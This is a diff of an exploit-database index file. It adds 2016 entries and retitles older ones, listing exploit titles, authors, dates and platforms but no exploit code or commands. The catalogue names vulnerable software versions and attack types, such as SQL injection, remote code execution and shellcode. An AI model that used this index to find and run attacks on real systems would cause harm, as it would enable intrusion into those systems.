+40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
@@ -28278,7 +28280,7 @@ id,file,description,date,author,platform,type,port
 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0
 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0
 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0
-31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI redirection",2008-04-23,"Richard Brain",windows,remote,0
+31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0
 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0
 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0
 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
@@ -28362,6 +28364,7 @@ id,file,description,date,author,platform,type,port
 31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+40354,platforms/android/remote/40354.txt,"Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0
 31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
@@ -28427,6 +28430,7 @@ id,file,description,date,author,platform,type,port
 31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
 31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0
+40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
@@ -28702,7 +28706,7 @@ id,file,description,date,author,platform,type,port
 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
-31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
+31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0
 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
@@ -28757,6 +28761,7 @@ id,file,description,date,author,platform,type,port
 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0
 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0
 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+40350,platforms/windows/local/40350.py,"Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0
 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0
@@ -28818,6 +28823,7 @@ id,file,description,date,author,platform,type,port
 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0
 31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
+40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0
@@ -28893,7 +28899,7 @@ id,file,description,date,author,platform,type,port
 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0
 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0
 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0
-32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload",2014-03-03,"Christian Catalano",php,webapps,0
+32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps,0
 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0
 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0
@@ -29295,7 +29301,7 @@ id,file,description,date,author,platform,type,port
 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
-32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443
+32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorisation",2014-03-26,Metasploit,linux,remote,443
 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i Parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0
 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0
@@ -30100,7 +30106,7 @@ id,file,description,date,author,platform,type,port
 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0
 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0
 33365,platforms/php/webapps/33365.txt,"WordPress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0
-40345,platforms/php/webapps/40345.txt,"Freepbx 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0
+40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0
 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0
 33367,platforms/php/webapps/33367.txt,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0
 33368,platforms/php/webapps/33368.html,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0
@@ -30414,6 +30420,7 @@ id,file,description,date,author,platform,type,port
 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0
 40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0
+40351,platforms/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80
 33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0
 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component - 'maintree' Parameter Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0
@@ -30469,6 +30476,7 @@ id,file,description,date,author,platform,type,port
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0
+40352,platforms/win_x86/shellcode/40352.c,"Windows x86 - Bind Shell TCP Shellcode",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0
 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0
 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0
@@ -30631,7 +30639,7 @@ id,file,description,date,author,platform,type,port
 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0
 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80
-33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80
+33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload",2014-07-07,Metasploit,php,remote,80
 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0
 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0
 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0
@@ -30742,8 +30750,8 @@ id,file,description,date,author,platform,type,port
 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0
-34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
-34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
+34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
+34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0
 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0
@@ -31412,7 +31420,7 @@ id,file,description,date,author,platform,type,port
 34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21
 34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injections",2014-10-02,Portcullis,php,webapps,80
 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443
-34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
+34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80
 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0
@@ -31635,7 +31643,7 @@ id,file,description,date,author,platform,type,port
 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference",2014-10-28,Metasploit,windows,local,0
-35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
+35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0
 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0
 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
@@ -31682,7 +31690,7 @@ id,file,description,date,author,platform,type,port
 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
-35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authentication SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
+35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100
 35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0
@@ -31941,7 +31949,7 @@ id,file,description,date,author,platform,type,port
 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80
 35440,platforms/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0
-35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655
+35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655
 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0
 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
@@ -32109,7 +32117,7 @@ id,file,description,date,author,platform,type,port
 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0
 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0
 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0
-35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authentication SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
+35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
 35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
 35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
@@ -32134,7 +32142,7 @@ id,file,description,date,author,platform,type,port
 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0
 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0
 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0
-35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution",2014-12-30,drone,windows,remote,0
+35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0
 35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0
 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0
 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0
@@ -32315,7 +32323,7 @@ id,file,description,date,author,platform,type,port
 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0
 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0
-35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
+35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated Arbitrary File Upload",2015-01-20,Metasploit,java,remote,8080
 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
 35847,platforms/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
 35848,platforms/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
@@ -32420,8 +32428,8 @@ id,file,description,date,author,platform,type,port
 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/JavaScript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0
 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0
 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0
-35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
-35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0
+35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
+35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0
 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0
 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80
 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0
@@ -32644,7 +32652,7 @@ id,file,description,date,author,platform,type,port
 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0
 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0
 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0
-36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80
+36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
